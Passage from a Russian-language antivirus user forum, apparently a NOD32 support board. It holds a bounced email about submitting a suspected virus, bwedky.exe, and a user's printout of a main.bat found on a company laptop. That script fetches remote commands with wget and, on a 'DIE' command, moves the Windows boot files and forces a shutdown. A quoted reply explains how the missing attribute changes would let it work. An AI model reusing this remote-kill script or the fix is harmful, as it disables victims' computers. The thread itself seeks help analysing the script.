Выбрать дату в календареВыбрать дату в календаре

Вирус bwedky.exe
[B]virusesnod32@[COLOR=#0000FF]gmail.com[/COLOR]

Не могу я отправить Вам
Вот пытался:[/B]

Статус доставки:
messagedelivery-status1.2

Reporting-MTA: dns; forward14.mail.yandex.net
X-Yandex-Queue-ID: 042CA4E5110A
X-Yandex-Sender: rfc822; infowins@yandex.ru
Arrival-Date: Thu, 15 Jul 2010 10:20:49 +0400 (MSD)

Final-Recipient: rfc822; virusesnod32@gmail.com
Original-Recipient: rfc822;virusesnod32@gmail.com
Action: failed
Status: 5.7.0
Remote-MTA: dns; gmail-smtp-in.l.google.com
Diagnostic-Code: smtp; 552-5.7.0 Our system detected an illegal attachment on
   your message. Please 552-5.7.0 visit
   http://mail.google.com/support/bin/answer.py?answer=6590 to 552 5.7.0
   review our attachment guidelines. r23si31936fam.169
609





*********

Это письмо отправлено почтовым сервером yandex.ru

К сожалению, мы вынуждены сообщить Вам о том, что Ваше письмо не может
быть отправлено одному или нескольким адресатам. Причины указаны ниже.

Пожалуйста, не отвечайте на это сообщение.

             **********

This is the mail system at host yandex.ru

I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.

Please, do not reply to this message.


<virusesnod32@gmail.com>: host gmail-smtp-in.l.google.com[74.125.43.27] said:
   552-5.7.0 Our system detected an illegal attachment on your message. Please
   552-5.7.0 visit http://mail.google.com/support/bin/answer.py?answer=6590 to
   552 5.7.0 review our attachment guidelines. r23si31936fam.169 (in reply to
   end of DATA command)
Изменено: Виктор - 15.07.2010 10:50:48
Вирус bwedky.exe
Как удалить?
Нет кнопки "Правка/Изменить"

Убрал галку "Публичный"
Установил пароль на скачивание.
Изменено: Виктор - 15.07.2010 10:46:07
Вирус bwedky.exe
Возможно данный файл прописывает маршруты.
Залил: http://rghost.ru/2125511
Отчет сканера: http://www.virscan.org/report/e9eeb29a2913192e71762d0018a5461e.html
Запланированные задания (угроза)
Ни одного ответа от Администраторов.
Запланированные задания (угроза)
[QUOTE]системные файлы перенести не так уж просто.
надо для начала атрибуты им поменять. без этого получается такое:

[B]C:\>move /y c:\boot.ini c:\windows
Не удается найти указанный файл.

C:\>move /y c:\ntdetect.com c:\windows
Не удается найти указанный файл.

C:\>move /y c:\ntldr c:\windows
Не удается найти указанный файл.

C:\>attrib boot.ini
SHR C:\boot.ini

C:\>attrib ntdetect.com
A SHR C:\NTDETECT.COM

C:\>attrib ntldr
A SHR C:\ntldr

C:\>[/B]

т.е. "плохой батник" должен начинаться со строчек
attrib -shr +a boot.ini
attrib -shr ntdetect.com
attrib -shr ntldr

и то я сильно сомневаюсь, что винда "разрешит" такие изменения.[/QUOTE]
Запланированные задания (угроза)
Может данным методом при последующей установки ОС файл уживается в системе?
Запланированные задания (угроза)
Подскажите о каких сведениях может идти речь?

Сайт в структуре bat файла [COLOR=#FF0000]RMH.RU[/COLOR]
Запланированные задания (угроза)
Здравствуйте! объясните пожалуйста смысл файла main.bat который запускается автозагрузкой и включает задачи странного названия.

Были выполнены действия:
1) c:\windows\system32\[COLOR=#FF0000]main.bat[/COLOR] удалил файл.
2) Удалил файлы:
c:\windows\tasks\[COLOR=#FF0000]at1.job[/COLOR]
c:\windows\tasks\[COLOR=#FF0000]at2.job[/COLOR]
c:\windows\tasks\[COLOR=#FF0000]at3.job[/COLOR]
c:\windows\tasks\[COLOR=#FF0000]at4.job[/COLOR]
c:\windows\tasks\[COLOR=#FF0000]At1.job[/COLOR]
c:\windows\tasks\[COLOR=#FF0000]At2.job[/COLOR]
c:\windows\tasks\[COLOR=#FF0000]At3.job[/COLOR]
c:\windows\tasks\[COLOR=#FF0000]At4.job[/COLOR]

[COLOR=#006699]route print - чист[/COLOR]

Структура bat файла:
[CODE]@echo off
cd c:\windows\system32
:begin
echo Searching for IP adress...
ipconfig | grep IP
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto noip

:ipfound
echo IP address found in ipconfig output
echo Pinging RMH.RU
ping -n 1 rmh.ru | grep.exe Ping
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto noreply

:inet
echo Reply from RMH.RU retrieved
echo Empty command
echo > command.txt
echo Retrieving command from server...
wget --quiet --input-file=server.url --tries=3 --output-document=command.txt --timeout=30 --no-directories --no-host-directories --cache=off --user-agent=zmey2-0.1
echo Retrieved, checking command
type command.txt | grep STOP
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto end


:STOP
type command.txt | grep STOP > nul
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto wcommand

:die
echo DIE command retrieved
echo Moving boot.ini, ntdetect.com, ntldr

move /y c:\boot.ini c:\windows
move /y c:\ntdetect.com c:\windows
move /y c:\ntldr c:\windows
echo Shuting down
shutdown -s -f -t 0 -c "Computer must be returned"
goto end

:noip
echo IP address not found in ipconfig output
goto end

:noreply
echo No reply from RMH.RU
goto end

:wcommand
echo Wrong command retrieved. Typing command:
echo ---
type command.txt
echo ---
goto end

:error
echo Grep error
goto end

:end
[/CODE]

Вопрос такого характера - ноутбук, предоставлен компанией "Ромир", у меня подозрения, что они какие-то сведения хотели получать, при подключении к их сайту.
Долго ещё порнобанеры будет пробивать Nod32 как снаряд салфетку?
Компьютер в качестве шлюза, на котором установлена антивирусная система и большая часть антишпионских программ. Процент можно повышать до 70%
Интернет провайдер > Компьютер-шлюз (Symantec) > Компьютер-основной (NOD32)
Предложения по работе технической поддержки
[b]cheremburum cheremburum,[/b]
[QUOTE]видимо админы сайта не особо разборчивы при выборе партнёров[/QUOTE]
Ты будешь? думать о безопасности клиентов когда за один клик на партнерскую ссылку тебе заплатят как минимум 1$
Изменено: Виктор - 07.07.2010 04:51:59